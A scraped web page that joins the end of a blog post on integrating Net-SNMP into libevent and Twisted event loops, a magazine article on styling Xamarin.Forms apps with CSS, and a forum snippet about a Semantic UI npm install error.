do { if (event_base_got_break(base) || event_base_got_exit(base)) break; netsnmp_check_outstanding_agent_requests(); levent_snmp_update(); } while (event_base_loop(base, EVLOOP_ONCE) == 0);
Here is how are defined the two callbacks:
static void levent_snmp_read(evutil_socket_t fd, short what, void *arg) { FD_ZERO(&fdset); FD_SET(fd, &fdset); snmp_read(&fdset); levent_snmp_update(); } static void levent_snmp_timeout(evutil_socket_t fd, short what, void *arg) { snmp_timeout(); run_alarms(); levent_snmp_update(); }
Twisted reactor#
As a second example, here is how to integrate Net-SNMP into
Twisted reactor. Twisted is an event-driven network programming
framework written in Python. It does not come with support for
SNMP.2 Because of the language mismatch, the integration
of Net-SNMP in Twisted needs to be done using a C extension or the
ctypes module.3
Twisted event loop is called a reactor. Like for libevent, events
need to be registered. It is possible to register file descriptor-like
objects using a class implementing a handful of methods. Here is the
implementation of such a class (adapted from PyNet-SNMP, a subproject
of Zenoss using the
ctypes module):
class SnmpReader: "Respond to input events" implements(IReadDescriptor) def __init__(self, fd): self.fd = fd def doRead(self): netsnmp.snmp_read(self.fd) def fileno(self): return self.fd
Like for libevent, we have a function to update the list of SNMP
related events (stored as a mapping between file descriptors and
SnmpReader instances):
class Timer(object): callLater = None timer = Timer() fdMap = {} def updateReactor(): "Add/remove event handlers for SNMP file descriptors and timers" fds, t = netsnmp.snmp_select_info() for fd in fds: if fd not in fdMap: reader = SnmpReader(fd) fdMap[fd] = reader reactor.addReader(reader) current = Set(fdMap.keys()) need = Set(fds) doomed = current - need for d in doomed: reactor.removeReader(fdMap[d]) del fdMap[d] if timer.callLater: timer.callLater.cancel() timer.callLater = None if t is not None: timer.callLater = reactor.callLater(t, checkTimeouts)
Contrary to libevent, we cannot alter the main loop to call
updateReactor() at each iteration. Therefore, it must be called
after each SNMP related function.
For another example, have a look at my equivalent implementation as a C extension.
Miscellaneous#
Lack of asynchronicity#
Integrating Net-SNMP into an event-based program is not risk-free. I have written a fairly comprehensive article on the lack of asynchronicity in Net-SNMP AgentX protocol implementation. I urge you to read it if you want to integrate a SNMP subagent into an existing program.
On the manager side, you will get similar drawbacks when using
SNMPv3. To retrieve or manipulate management information using SNMPv3,
it is necessary to know the identifier of the remote SNMP protocol
engine. This identifier can be configured directly on each manager but
it is usually discovered by querying
SNMP-FRAMEWORK-MIB::snmpEngineID, as described in RFC 5343.
Unfortunately, this discovery is done synchronously by
Net-SNMP. There is a bug report for this issue but it
seems difficult to fix. I have not been able to come up with a proper
patch but I have described a workaround around
snmp_sess_async_send().
There is no such problem with SNMPv2.
Limitation of file descriptor sets#
snmp_select_info() and
snmp_read() uses the
fd_set type to
handle a set of file descriptors. This type should be manipulated with
FD_CLR(),
FD_ISSET(),
FD_SET() and
FD_ZERO(). They may be
defined as functions but they usually are macros. Moreover, no file
descriptor greater than
FD_SETSIZE (which is usually set to 1024)
can be handled with the
fd_set type. This means that if you have a
file descriptor greater than 1024, you won’t be able to use
snmp_select_info() with it.
Starting from Net-SNMP 5.5, you can use
snmp_select_info2() and
snmp_read2() instead of
snmp_select_info() and
snmp_read(). They
use the
netsnmp_large_fd_set.
If you want to keep compatibility with Net-SNMP 5.4, here is another
twist. The
fd_set type is usually a fixed-size array of long
integers.
FD_CLR(),
FD_ISSET() and
FD_SET() are
size-independant. The size only matters for
FD_ZERO() which is not
used by either
snmp_select_info() or
snmp_read(). You can
therefore allocate a larger
fd_set. A common way is to compile your
program with
-D__FD_SETSIZE=4096. You can still use
FD_ZERO()
yourself. However, this is not portable (GNU C Library only). Another
way is to allocate your own array of long integers and cast it to
fd_set. You’ll have to redefine
FD_ZERO():
typedef struct { long int fds_bits[4096/sizeof(long int)]; } my_fdset; #undef FD_ZERO #define FD_ZERO(fdset) memset((fdset), 0, sizeof(my_fdset)) { /* ... */ my_fdset fdset; FD_ZERO(&fdset); /* ... */ rc = snmp_select_info(&n, (fd_set *)&fdset, &timeout, &block); /* ... */ }
Threads#
Net-SNMP provides two API:
- the traditional session API which is not thread-safe and
- the single session API.
In the above examples, I have used the traditional session API. If you
are using threads, you need to ensure that all SNMP operations are
done in a single thread. Otherwise, you need to adapt the examples to
use the single session API.
snmp_select_info() is part of the
traditional session API. You should replace it with
snmp_sess_select_info() and keep a list of SNMP sessions.
This API is not available for the agent side of Net-SNMP.
The event list is global but some code could be added to bind a different list for each base in case you use different bases. This is not needed in the case of lldpd. ↩︎
TwistedSNMP is an SNMP protocol implementation for Twisted based on PySNMP but is not maintained anymore. PySNMP comes with examples on how to integrate with Twisted. ↩︎
Nowadays, it should be done with CFFI. ↩︎ | https://vincent.bernat.ch/en/blog/2012-snmp-event-loop | CC-MAIN-2020-05 | en | refinedweb |
Cross Platform C#
Some.
In Defense of CSS
I've long lamented the traditional approaches to styling mobile applications, especially in trying to do so across multiple platforms. Android has a decent theming system, but it gets messy pretty quickly. iOS has the UIAppearance APIs, but they tend to fall far short of allowing you to truly centralize an app's styling. Styling Windows applications via XAML has always managed to feel foreign to me.
I'll also admit that in addition to mobile development I've also been a big fan of Web development for a long time, so CSS is something I'm quite familiar with. It's not without its problems, of course, but it's also important to remember to draw the distinction between the language and the platforms. Many of the Web's problems historically have stemmed from inconsistent browser support and the need for workarounds, which manifests itself in CSS but isn't the fault of CSS.
If you're a XAML developer coming from WPF or UWP, you already know that XAML in Xamarin.Forms -- while still XAML -- is not exactly the same as you remember from those platforms. I encourage you to approach thinking about CSS in much the same way. At its core, CSS is an expressive, centralized and productive way to define an application's styles.
Rather than continuing to make the theoretical argument, let's take a look at what this looks like in an actual application!
Creating the App
CSS support in Xamarin.Forms was introduced in version 3.0, which shipped on May 7. I'll start from scratch to show how easy it is to start styling Xamarin.Forms apps with CSS. Start out by creating a new Xamarin.Forms application using the Blank Forms App template, naming it CSSDemo.
Next, open the generated CSSDemoPage.xaml file and replace its contents with:
<?xml version="1.0" encoding="utf-8"?>
<ContentPage xmlns=""
xmlns:x=""
xmlns:local="clr-namespace:CSSDemo"
x:
<StackLayout>
<Label Text="Welcome to CSS!" />
<StackLayout>
<Entry Placeholder="Email Address" />
<Entry Placeholder="Password" IsPassword="true" />
<Button Text="Login" />
<Button Text="Forgot Password?" />
</StackLayout>
</StackLayout>
</ContentPage>
Here I create a basic login form, with fields for e-mail and password and buttons for logging in and starting a forgot password flow. Obviously there's no styling here, so spinning up the app now isn't going to look particularly appealing (see Figure 1).
Normally this is when you would start adding styles directly to your XAML, but in this case I'm going to approach this more like a Web developer would. Bear with me!
Adding the Style Sheet
First, I'll create a style sheet that will contain all of the app's styles. Add a new CSS file to the project named Styles.css (see Figure 2).
Once that is added, make sure to set its build action to EmbeddedResource so that it gets added properly to the project (see Figure 3).
Finally, I'll just add a directive to the XAML page to pull in the CSS file:
<ContentPage.Resources>
<StyleSheet Source="Styles.css" />
</ContentPage.Resources>
Styling the App
Now that there's a style sheet, it's time to start styling!
If you're familiar with CSS already, then the Xamarin.Forms flavor of CSS will feel quite familiar. There are some differences, though, including the addition of syntax to allow for targeting object types in Xamarin.Forms directly using a ^:
^ContentPage {
background-color: #B9BAA3;
padding: 15;
}
Just by adding these few lines, any page that inherits from ContentPage will automatically get this background color and padding. It's defined in one place and is easily shared across an entire application.
Next I'll go ahead and style the label to look a little nicer:
^Label {
text-align: center;
font-style: bold;
font-size: 30;
color: #A22C29;
}
You might also notice that the properties here are deliberately aligned with what CSS exposes on the Web, making it easy to get started applying any CSS skills you might have to your native applications. Without making any changes to the XAML the label will now be bold, centered, in a larger font, and in a different color(see Figure 4).
This looks a little bit better, but it's still not that visually appealing. We can do better! If you've used CSS before, you're already likely familiar with the ability to assign identifiers to elements and target them directly in your styles. That's exactly what I'll do here, assigning an identifier to the container around the form:
<StackLayout StyleId="LoginForm">
That allows this element to be targeted in CSS:
#LoginForm {
background-color: #D6D5C9;
padding: 15;
border-radius: 5;
margin-top: 20
}
This creates some separation between the background and the form, but the entry and button elements are still a bit mundane. First, I'll apply a new base style to all entry elements:
^Entry {
font-size: 30;
background-color: white;
margin: 10 0;
color: #0A100D;
}
I'll also create a new base style for all buttons:
^Button {
font-size: 16;
color: #A22C29;
margin: 5 0;
}
Now all entry elements will be larger with a small top margin, and buttons will have a different color and a small top margin of their own. That's a good start, but I'd also like to create a distinction between the login action, the primary action on the screen, and the forgot password action.
To do this, I'll introduce a new style for primary buttons, which should also feel familiar if you've worked with CSS before. To do this, I'll simply add an attribute to the login button:
<Button Text="Login" StyleClass="primary" />
Then I can target that in CSS as an extension to the base button style:
^Button.primary {
background-color: #902923;
color: #FFFFFF;
font-size: 20;
margin: 15 0;
}
Primary buttons will have a different background and foreground color, font size, and a larger margin. This will make them visually distinct from other buttons in the UI. With this new style applied, the UI will now look like Figure 5.
Summary
There are many different approaches to styling a Xamarin.Forms application, and this is by no means meant to contend that using CSS is the only (or even best) way to do so. That said, you can see here that the application's XAML code was able to stay lean and free of any style directives, and a few lines of CSS were able to transform that raw markup into a very different visual experience.
Just because CSS is most associated with Web programming, and thus associated with all the woes that accompany that, don't let it stop you from appreciating its power in being able to easily express the visual representations you're seeking in your applications. Maybe CSS is the missing link you were looking for, or maybe it's not, but I encourage you to check it out and see if it helps!. | https://visualstudiomagazine.com/articles/2018/04/01/styling-xamarin-forms.aspx | CC-MAIN-2020-05 | en | refinedweb |
Often.
The Problem
During this time I was working for a web scraping company, and my role was to provide some means of anomaly detection and cluster data points into common records. The clustering problem is the question of interest here.
It's a relatively straightforward problem, given fields
a,
b, and
c take the average price for records with the same values of
a,
b and
c. The simplest way to do this is to hash on those values and cluster based on the shared hash value. Here is a simple but flawed approach to creating a perfect hash.
class Record: def __init__(self, a,b,c): self.a = a self.b = b self.c = c def __hash__(self): return int("{}{}{}".format(self.a, self.b, self.c))
We can write some unit tests for this simple hash as well.
def test_hash(): assert hash(Record(1,2,3)) == hash(Record(1,2,3)) assert hash(Record(23,45,6)) != hash(Record(45,23,3)) assert hash(Record(11,11,2)) != hash(Record(11,11,3))
We can keep on creating more test cases, but before we do lets shed some light on a fatal flaw for our simple hash function. All of the following assertions are true with the simple hash.
assert hash(Record(11,21,3)) == hash(Record(11,2,13))
The question is how could we have caught that bug before shipping it into production?
Unit Testing
Consider the case in which a programmer wrote unit tests and had an insight to test for this degenerate case. This is the best outcome, but is not a deterministic one, the programmer could very easily not have had that insight. Our goal is to catch these bugs without relying on an insight from a programmer. However once this insight is had, it's a clear thing to test for and ought to be. It's clear unit testing doesn't help as much as we would like. It is a good exercise for a programmer to think about edge cases, but is not a silver bullet.
Property Based Testing
Consider a programmer who realizes that our unit tests only cover a small section of the input space, it would be good to assert behavior across a broader set of that space. We can write the following:
@given( a=integers(max_value=100, min_value=1), b=integers(max_value=100, min_value=1), c=integers(max_value=100, min_value=1), d=integers(max_value=100, min_value=1), e=integers(max_value=100, min_value=1), f=integers(max_value=100, min_value=1), ) def test_hash(a, b, c, d, e, f): first_record = Record(a, b, c) second_record = Record(d, e, f) true_equal = a == d and b == e and c == f hash_equal = hash(first_record) == hash(second_record) if true_equal: assert hash_equal else: assert not hash_equal if hash_equal: assert true_equal
In order for this bug to be caught with property based testing a number of preconditions must be met.
Given input
a,
b,
c, one of these inputs have to be greater than 10. But more importantly for any two inputs, we have to randomly select 2 specific numbers which are set to either
d,
e,
f. The probability of randomly stumbling across this bug with a property based tester is around one in a million. When we add in one of those inputs needs to be larger than 10 we're left with 1 in 10 million. Needless to say those aren't very good odds.
Where does this leave us
So what then is the best way to approach such problems? It's clear that random property based testing is not effective, and the same is true of standard unit testing. Is this a class of problems that are especially difficult to test for?
The class of issues we're trying to hone in on are unknown unknowns, that is we don't know that we don't know them. If we know that they're a problem then we can clearly write unit tests that test for that issue specifically.
Hypothetically we could enumerate the entire domain of our simple hash function, but in this case we'll be looking at O(100^6) or O(1 Bil) operations. This is also for a relatively small space. So this approach is generally untenable.
Besides hoping something clicks in the mind of the programmer, I'm not sure what else one could do to prevent these sorts of issues. If you have a good approach please send me an email with it and I'll amend my post here with updated information.
Of course the simple fix for our problem is as follows:
class Record: """Given bounds on a <= 99999, b <= 99, and c <= 99""" def __init__(self, a, b, c): self.a = a self.b = b self.c = c def __hash__(self): return int("{:5d}{:2d}{:2d}".format(self.a, self.b, self.c)) | https://devinmcgloin.com/writing/2018/testing/ | CC-MAIN-2020-05 | en | refinedweb |
Angular is a mature technology with introduction to new way to build applications. Think of Angular Pipes as modernized version of filters comprising functions or helps used to format the values within the template. Pipes in Angular are basically extension of what filters were in Angular v1. There are many useful built-in Pipes we can use easily in our templates. In today’s tutorial we will learn about Built-in Pipes as well as create our own custom user-defined pipe.
Angular Pipes – overview
Pipes allows us to format the values within the view of the templates before it’s displayed.
For example, in most modern applications, we want to display terms, such as today, tomorrow, and so on and not system date formats such as April 13 2017 08:00. Let’s look more real-world scenarios.
You want the hint text in the application to always be lowercase? No problem; define and use lowercasePipe. In weather app, if you want to show month name as MAR or APR instead of full month name, use DatePipe.
Cool, right? You get the point. Pipes helps you add your business rules, so you can transform the data before it’s actually displayed in the templates.
A good way to relate Angular Pipes is similar to Angular 1.x filters. Pipes do a lot more than just filtering.
We have used Angular Router to define Route Path, so we have all the Pipes functionalities in one page. You can create in same or different apps. Feel free to use your creativity.
In Angular 1.x, we had filters–Pipes are replacement of filters.
Defining a Pipe
The pipe operator is defined with a pipe symbol (|) followed by the name of the pipe:
{{ appvalue | pipename }}
The following is an example of a simple lowercase pipe:
{{"Sridhar Rao" | lowercase}}
In the preceding code, we are transforming the text to lowercase using the lowercase pipe. Now, let’s write an example component using the lowercase pipe example:
@Component({ selector: 'demo-pipe', template: ` Author name is {{authorName | lowercase}} ` }) export class DemoPipeComponent { authorName = 'Sridhar Rao'; }
Let’s analyze the preceding code in detail:
- We are defining a DemoPipeComponent component class
- We are creating string variable authorName and assigning the value ‘Sridhar Rao’.
- In the template view, we display authorName, but before we print it in the UI we transform it using the lowercase pipe
Run the preceding code, and you should see the screenshot shown as follows as an output:
Well done! In the preceding example, we have used a Built-in Pipe. In next sections, you will learn more about the Built-in Pipes and also create a few custom Pipes.
Note that the pipe operator only works in your templates and not inside controllers.
Built-in Pipes
Angular Pipes are modernized version of Angular 1.x filters. Angular comes with a lot of predefined Built-in Pipes.
We can use them directly in our views and transform the data on the fly.
The following is the list of all the Pipes that Angular has built-in support for: DatePipe
- DecimalPipe
- CurrencyPipe
- LowercasePipe and UppercasePipe
- JSON Pipe
- SlicePipe
- async Pipe
In the following sections, let’s implement and learn more about the various pipes and see them in action.
DatePipe
DatePipe, as the name itself suggest, allows us to format or transform the values that are date related.
DatePipe can also be used to transform values in different formats based on parameters passed at runtime.
The general syntax is shown in the following code snippet:
{{today | date}} // prints today's date and time {{ today | date:'MM-dd-yyyy' }} //prints only Month days and year {{ today | date:'medium' }} {{ today | date:'shortTime' }} // prints short format
Let’s analyze the preceding code snippets in detail:
- As explained in the preceding section, the general syntax is variable followed with a (|) pipe operator followed by name of the pipe operator
- We use the date pipe to transform the today variable
- Also, in the preceding example, you will note that we are passing few parameters to the pipe operator. We will cover passing parameters to the pipe in the following section
Now, let’s create a complete example of the date pipe component. The following is the code snippet for implementing the DatePipe component:
import { Component } from '@angular/core'; @Component({ template: `
Built-In DatePipe
`, })`, })
- DatePipe example expression
Today is {{today | date}}
{{ today | date:'MM-dd-yyyy' }}
{{ today | date:'medium' }}
{{ today | date:'shortTime' }}
Let’s analyze the preceding code snippet in detail:
- We are creating a PipeComponent component class.
- We define a today variable.
- In the view, we are transforming the value of variable into various expressions based on different parameters.
Run the application, and we should see the output as shown in the following screenshot:
We learned the date pipe in this section. In the following sections, we will continue to learn and implement other Built-in Pipes and also create some custom user-defined pipes.
DecimalPipe
In this section, you will learn about yet another Built-in Pipe–DecimalPipe.
DecimalPipe allows us to format a number according to locale rules. DecimalPipe can also be used to transform a number in different formats.
The general syntax is shown as follows:
appExpression | number [:digitInfo]
In the preceding code snippet, we use the number pipe, and optionally, we can pass the parameters.
Let’s look at how to create a DatePipe implementing decimal points. The following is an example code of the same:
import { Component } from '@angular/core'; @Component({ template: ` state_tax (.5-5): {{state_tax | number:'.5-5'}} state_tax (2.10-10): {{state_tax | number:'2.3-3'}} `, }) export class PipeComponent { state_tax: number = 5.1445; }
Let’s analyze the preceding code snippet in detail:
- We defie a component class–PipeComponent.
- We define a variable–state_tax.
- We then transform state_tax in the view.
- The first pipe operator tells the expression to print the decimals up to five decimal places.
- The second pipe operator tells the expression to print the value to three decimal places.
The output of the preceding pipe component example is given as follows:
Undoubtedly, number pipe is one of the most useful and used pipe across various applications. We can transform the number values specially dealing with decimals and floating points.
CurrencyPipe
Applications that intent to cater to multi-national geographies, we need to show country- specific codes and their respective currency values. That’s where CurrencyPipe comes to our rescue.
The CurrencyPipe operator is used to append the country codes or currency symbol in front of the number values.
Take a look the code snippet implementing the CurrencyPipe operator:
{{ value | currency:'USD' }}
Expenses in INR:
{{ expenses | currency:'INR' }}
Let’s analyze the preceding code snippet in detail:
- The first line of code shows the general syntax of writing a currency pipe.
- The second line shows the currency syntax, and we use it to transform the expenses value and append the Indian currency symbol to it.
So now that we know how to use a currency pipe operator, let’s put together an example to display multiple currency and country formats.
The following is the complete component class, which implements a currency pipe operator: }}
Let’s analyze the the preceding code in detail:
- We created a component class, CurrencyPipeComponent, and declared few variables, namely salary and expenses.
- In the component template, we transformed the display of the variables by adding the country and currency details.
- In the first pipe operator, we used ‘currency : USD’, which will append the ($) dollar symbol before the variable.
- In the second pipe operator, we used ‘currency : ‘INR’:false’, which will add the currency code, and false will tell not to print the symbol.
Launch the app, and we should see the output as shown in the following screenshot:
In this section, we learned about and implemented CurrencyPipe. In the following sections, we will keep exploring and learning about other Built-in Pipes and much more. }}
The LowercasePipe and UppercasePipe, as the name suggests, help in transforming the text into lowercase and uppercase, respectively.
Take a look at the following code snippet:
Author is Lowercase
{{authorName | lowercase }}
Author in Uppercase is
{{authorName | uppercase }}
Let’s analyze the preceding code in detail:
- The first line of code transforms the value of authorName into a lowercase using the lowercase pipe
- The second line of code transforms the value of authorName into an uppercase using the uppercase pipe.
Now that we saw how to define lowercase and uppercase pipes, it’s time we create a complete component example, which implements the Pipes to show author name in both lowercase and uppercase.
Take a look at the following code snippet:
import { Component } from '@angular/core'; @Component({ selector: 'textcase-pipe', template: `
Built-In LowercasPipe and UppercasePipe
` }) export class TextCasePipeComponent { authorName = "Sridhar Rao"; }` }) export class TextCasePipeComponent { authorName = "Sridhar Rao"; }
- LowercasePipe example
Author in lowercase is {{authorName | lowercase}}
- UpperCasePipe example
Author in uppercase is {{authorName | uppercase}}
Let’s analyze the preceding code in detail:
- We create a component class, TextCasePipeComponent, and define a variable authorName.
- In the component view, we use the lowercase and uppercase pipes.
- The first pipe will transform the value of the variable to the lowercase text.
- The second pipe will transform the value of the variable to uppercase text.
Run the application, and we should see the output as shown in the following screenshot:
In this section, you learned how to use lowercase and uppercase pipes to transform the values.
JSON Pipe
Similar to JSON filter in Angular 1.x, we have JSON Pipe, which helps us transform the string into a JSON format string.
In lowercase or uppercase pipe, we were transforming the strings; using JSON Pipe, we can transform and display the string into a JSON format string.
The general syntax is shown in the following code snippet:
{{ myObj | json }}
Now, let’s use the preceding syntax and create a complete component example, which uses the JSON Pipe:
import { Component } from '@angular/core'; @Component({ template: `
Author Page{{ authorObj | json }}` }) export class JSONPipeComponent { authorObj: any; constructor() { this.authorObj = { name: 'Sridhar Rao', website: '', Books: 'Mastering Angular2' }; } }
Let’s analyze the preceding code in detail:
- We created a component class JSONPipeComponent and authorObj and assigned the JSON string to the variable.
- In the component template view, we transformed and displayed the JSON string.
Run the app, and we should see the output as shown in the following screenshot:
JSON is soon becoming defacto standard of web applications to integrate between services and client technologies. Hence, JSON Pipe comes in handy every time we need to transform our values to JSON structure in the view.
Slice pipe
Slice Pipe is very similar to array slice JavaScript function. It gets a sub string from a strong certain start and end positions.
The general syntax to define a slice pipe is given as follows:
In the preceding code snippet, we are slicing the e-mail address to show only the first four characters of the variable value email_id.
Now that we know how to use a slice pipe, let’s put it together in a component. The following is the complete complete code snippet implementing the slice pipe:
import { Component } from '@angular/core'; @Component({ selector: 'slice-pipe', template: `
Built-In Slice Pipe
` }) export class SlicePipeComponent { emailAddress = "[email protected]"; }` }) export class SlicePipeComponent { emailAddress = "[email protected]"; }
- LowercasePipe example
- LowercasePipe example
Sliced Email Id is {{emailAddress | slice : 0: 4}}
Let’s analyze the preceding code snippet in detail:
- We are creating a class SlicePipeComponent.
- We defined a string variable emailAddress and assign it a value, [email protected].
- Then, we applied the slice pipe to the {{emailAddress | slice : 0: 4}} variable.
- We get the sub string starting 0 position and get four characters from the variable value of emailAddress.
Run the app, and we should the output as shown in the following screenshot:
SlicePipe is certainly a very helpful Built-in Pipe specially dealing with strings or substrings.
async Pipe
async Pipe allows us to directly map a promises or observables into our template view. To understand async Pipe better, let me throw some light on an Observable first.
Observables are Angular-injectable services, which can be used to stream data to multiple sections in the application. In the following code snippet, we are using async Pipe as a promise to resolve the list of authors being returned:
The async pipe now subscribes to the observable (authors) and retrieve the last value. Let’s look at examples of how we can use the async pipe as both promise and an observable.
Add the following lines of code in our app.component.ts file:
getAuthorDetails(): Observable
{ return this.http.get(this.url).map((res: Response) => res.json()); } getAuthorList(): Promise { return this.http.get(this.url).toPromise().then((res: Response) => res.json()); }
Let’s analyze the preceding code snippet in detail:
- We created a method called getAuthorDetails and attached an observable with the same. The method will return the response from the URL–which is a JSON output.
- In the getAuthorList method, we are binding a promise, which needs to be resolved or rejected in the output returned by the url called through a http request.
In this section, we have seen how the async pipe works. You will find it very similar to dealing with services. We can either map a promise or an observable and map the result to the template.
To summarize, we demonstrated Angular Pipes by explaining in detail about various built-in Pipes such as DatePipe, DecimalPipe, CurrencyPipe, LowercasePipe and UppercasePipe, JSON Pipe, SlicePipe, and async Pipe.
Read Next
Get Familiar with Angular
Interview – Why switch to Angular for web development
Building Components Using Angular | https://hub.packtpub.com/angular-pipes-angular-4/ | CC-MAIN-2020-05 | en | refinedweb |
Opened 11 years ago
Closed 11 years ago
#854 closed Bug (Fixed)
InetGetSize
Description
#include <Inet.au3>
$a = InetGetSize("")
If $a > 0 Then
_INetGetSource('')
$b = InetGetSize("http://" & $user & ":" & $pass & "@address/download/fis.upd"
MsgBox(262144, 'Size:', $b)
EndIf
-without _INetGetSource('')
always $b=0
why?
pls help
thanks.
Attachments (1)
Change History (7)
comment:1 Changed 11 years ago by Valik
comment:2 Changed 11 years ago by Jpm
added test script email by psandu.ro
for me the script work with or without the _InetGetSource
Changed 11 years ago by Jpm
comment:3 Changed 11 years ago by Jpm
- Resolution set to Works For Me
- Status changed from new to closed
comment:4 follow-up: ↓ 5 Changed 11 years ago by Jpm
- Resolution Works For Me deleted
- Status changed from closed to reopened
reopen as the test must be done thru a proxy as diagnose by psandu.ro
comment:5 in reply to: ↑ 4 Changed 11 years ago by Valik
comment:6 Changed 11 years ago by Valik
- Milestone set to 3.3.1.0
- Resolution set to Fixed
- Status changed from reopened to closed
I'm going to go out on a limb and say this is fixed in 3.3.1.0 (the beta we'll eventually release). When fixing another proxy-related issue I discovered that InetGetSize() did not go through a proxy at all. In 3.3.1.0 this has been fixed.. We must be able to reproduce an issue to fix it. | https://www.autoitscript.com/trac/autoit/ticket/854 | CC-MAIN-2020-05 | en | refinedweb |
Book.
Table of Contents
- Java Web Services in a Nutshell
- Preface
- Contents of This Book
- Related Books
- Web Services Programming Resources Online
- Examples Online
- Conventions Used in This Book
- Request for Comments
- Acknowledgments
- I. Introduction to the Java Web Services API
- 1. Introduction
- 2. JAX-RPC
- JAX-RPC Overview
- The JAX-RPC Programming Model
- A Simple JAX-RPC Example
- Programming with JAX-RPC
- The JAX-RPC Service Interface
- Converting the Service Interface Definition to Client-Side Stubs
- The Client-Side JAX-RPC API
- The Server-Side Implementation
- Deployment of a JAX-RPC Service in a Web Container
- Deploying a JAX-RPC Service onto the J2EE 1.4 Platform
- Deploying a JAX-RPC Service with the JWSDP
- Using EJBs to Implement Web Services
- 3. SAAJ
- Introduction to SAAJ
- SAAJ Programming
- SOAP Messages
- Creating and Sending a SOAP Message Using SAAJ
- Receiving a SOAP Message
- The Anatomy of a SAAJ SOAP Message
- Nodes, Elements, and Names
- More on SOAPElements
- SOAP Fault Handling
- SOAP Messages and MIME Headers
- SOAP with Attachments
- SOAP Headers
- Using SAAJ with Secure Connections
- 4. JAXM
- JAXM Overview
- Providers and Asynchronous Messaging
- An Example JAXM Application
- Implementing the Sending Servlet for the JAXM Echo Service
- Implementing the Receiving Servlet for the JAXM Echo Service
- Why Synchronous Messaging Does Not Work with a Provider
- JAXM Configuration
- The SOAP-RP Profile
- The ebXML Profile
- 5. WSDL
- WSDL Overview
- WSDL Elements
- The WSDL definitions Element
- Type Definitions
- Defining Messages
- Port Types and Operations
- Concrete Bindings
- The SOAP Binding
- The MIME Binding
- Ports and Services
- Using the import Element
- 6. Advanced JAX-RPC
- Using WSDL with JAX-RPC
- ServiceFactory and the Service Interface
- The Dynamic Invocation Interface
- JAX-RPC and J2EE 1.4 Application Clients
- Using Attachments
- RPC-Style and Document-Style JAX-RPC
- Client and Server Context Handling
- SOAP Header Processing
- Mapping Header Content to Method Arguments
- SOAP Message Handlers
- Serialization and Type Mappings
- 7. JAXR
- UDDI and ebXML Registries
- JAXR Architecture
- Using the JAXR Examples
- Using a UDDI Registry
- Using an ebXML Registry
- JAXR Registry Model Overview
- JAXR Programming
- Connecting to the Registry
- Retrieving Objects from the Registry
- Declarative Queries
- Asynchronous Queries
- Modifying the Registry
- Creating User-Defined Classification Schemes and Enumerated Types
- Deleting Registry Objects
- Level 1 Registry Features
- Registry Security
- 8. Web Service Tools and Configuration Files
- wscompile — JAX-RPC Stub and Tie Generation Utility
- wsdeploy — JAX-RPC Deployable Web Archive Generation Utility
- J2EEC — Utility for Creating Stubs and Ties for a JAX-RPC Web Service
- J2EE Deploytool — Utility for Deploying Modules and Enterprise Applications
- JAXM Client and Provider Configuration
- J2EE 1.4 Web Services Configuration File
- J2EE 1.4 JAX-RPC Mapping File
- II. API Quick Reference
- 9. The javax.xml.messaging Package
- 10. The javax.xml.namespace Package
- 11. The javax.xml.registry Package
- Package javax.xml.registry
- BulkResponse
- BusinessLifeCycleManager
- BusinessQueryManager
- CapabilityProfile
- Connection
- ConnectionFactory
- DeclarativeQueryManager
- DeleteException
- FederatedConnection
- FindException
- FindQualifier
- InvalidRequestException
- JAXRException
- JAXRResponse
- LifeCycleManager
- Query
- QueryManager
- RegistryException
- RegistryService
- SaveException
- UnexpectedObjectException
- UnsupportedCapabilityException
- 12. The javax.xml.registry.infomodel Package
- Package javax.xml.registry.infomodel
- Association
- AuditableEvent
- Classification
- ClassificationScheme
- Concept
- ExtensibleObject
- ExternalIdentifier
- ExternalLink
- ExtrinsicObject
- InternationalString
- Key
- LocalizedString
- Organization
- PersonName
- RegistryEntry
- RegistryObject
- RegistryPackage
- Service
- ServiceBinding
- Slot
- SpecificationLink
- TelephoneNumber
- URIValidator
- User
- Versionable
- 13. The javax.xml.rpc Package
- 14. The javax.xml.rpc.encoding Package
- 15. The javax.xml.rpc.handler Package
- 16. The javax.xml.rpc.handler.soap Package
- 17. The javax.xml.rpc.holders Package
- Package javax.xml.rpc.holders
- BigDecimalHolder
- BigIntegerHolder
- BooleanHolder
- BooleanWrapperHolder
- ByteArrayHolder
- ByteHolder
- ByteWrapperHolder
- CalendarHolder
- DoubleHolder
- DoubleWrapperHolder
- FloatHolder
- FloatWrapperHolder
- Holder
- IntegerWrapperHolder
- IntHolder
- LongHolder
- LongWrapperHolder
- ObjectHolder
- QNameHolder
- ShortHolder
- ShortWrapperHolder
- StringHolder
- 18. The javax.xml.rpc.server Package
- 19. The javax.xml.rpc.soap Package
- 20. The javax.xml.soap Package
- Package javax.xml.soap
- AttachmentPart
- Detail
- DetailEntry
- MessageFactory
- MimeHeader
- MimeHeaders
- Name
- Node
- SOAPBody
- SOAPBodyElement
- SOAPConnection
- SOAPConnectionFactory
- SOAPConstants
- SOAPElement
- SOAPElementFactory
- SOAPEnvelope
- SOAPException
- SOAPFactory
- SOAPFault
- SOAPFaultElement
- SOAPHeader
- SOAPHeaderElement
- SOAPMessage
- SOAPPart
- Text
- 21. Class, Method, and Field Index
- III. Appendix
- Index
- Colophon
Product Information
- Title: Java Web Services in a Nutshell
- Author(s):
- Release date: June 2003
- Publisher(s): O'Reilly Media, Inc.
- ISBN: 0596003994 | https://www.oreilly.com/library/view/java-web-services/0596003994/ | CC-MAIN-2020-05 | en | refinedweb |
Semantic is a UI component framework based around useful principles from natural language. Forkable JSFiddle:
[semantic-ui npm installation error]
Unable to install the npm package 'semantic-ui' using npm. Facing the following issue. Can it be fixed / can anyone help?
> [email protected] install D:\_\_Dev\test\node_modules\semantic-ui
> gulp install
fs.js:27
const { Math, Object } = primordials;
^
ReferenceError: primordials is not defined
at fs.js:27:26
at req_ (D:\_\_Dev\test\node_modules\natives\index.js:143:24)
at Object.req [as require] (D:\_\_Dev\test\node_modules\natives\index.js:55:10)
at Object.<anonymous> (D:\_\_Dev\test\node_modules\graceful-fs\fs.js:1:37))
at require (internal/modules/cjs/helpers.js:68:18)
npm WARN [email protected] No repository"})
npm ERR! code ELIFECYCLE
npm ERR! errno 1
npm ERR! [email protected] install: 'gulp install'
npm ERR! Exit status 1
npm ERR!
npm ERR! Failed at the [email protected] install script.
npm ERR! This is probably not a problem with npm. There is likely additional logging output above.
npm ERR! A complete log of this run can be found in:
npm ERR! C:\Users\VI20079771\AppData\Roaming\npm-cache\_logs\2019-11-12T13_57_01_157Z-debug.log
Does it mean 'semantic-ui' isn't so semantic afterall: ?
I have been trying the semantic-ui framework and trying to replace the sample codes filled with
